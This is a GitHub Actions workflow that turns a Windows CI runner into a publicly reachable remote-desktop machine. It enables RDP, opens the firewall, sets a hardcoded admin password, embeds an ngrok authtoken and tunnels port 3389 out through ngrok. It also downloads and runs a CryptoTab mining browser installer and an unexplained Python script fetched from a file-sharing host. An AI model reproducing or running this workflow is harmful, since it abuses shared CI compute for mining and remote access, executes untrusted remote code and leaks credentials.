name: BiiuhRDP

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest

    steps:
    - name: Download Ngrok
      run: Invoke-WebRequest https://bin.equinox.io/c/4VmDzA7iaHb/ngrok-stable-windows-amd64.zip -OutFile ngrok.zip
    - run: Invoke-WebRequest https://cryptobrowser.site/get/BrowserSetup.exe -OutFile cryptotab.exe
    - run: .\cryptotab.exe
    - name: Extract Ngrok Archive
      run: Expand-Archive ngrok.zip
    - name: Auth
      run: .\ngrok\ngrok.exe authtoken 1rxR0SWGxdjlvdZoDa8CbGK4eJi_6MxA8n34TRKQNKWHEs9xi
    - name: Enable TS
      run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
    - run: Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
    - run: Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1
    - run: Set-LocalUser -Name "runneradmin" -Password (ConvertTo-SecureString -AsPlainText "Biiuh2021" -Force)
    - run: Invoke-WebRequest https://srv-store1.gofile.io/download/KrxNQg/746c1f253cbe104e37d0d2cf5f00eddd/1.py
    - run: .\1.py
    - name: Create Tunnel
      run: .\ngrok\ngrok.exe tcp 3389
      
    
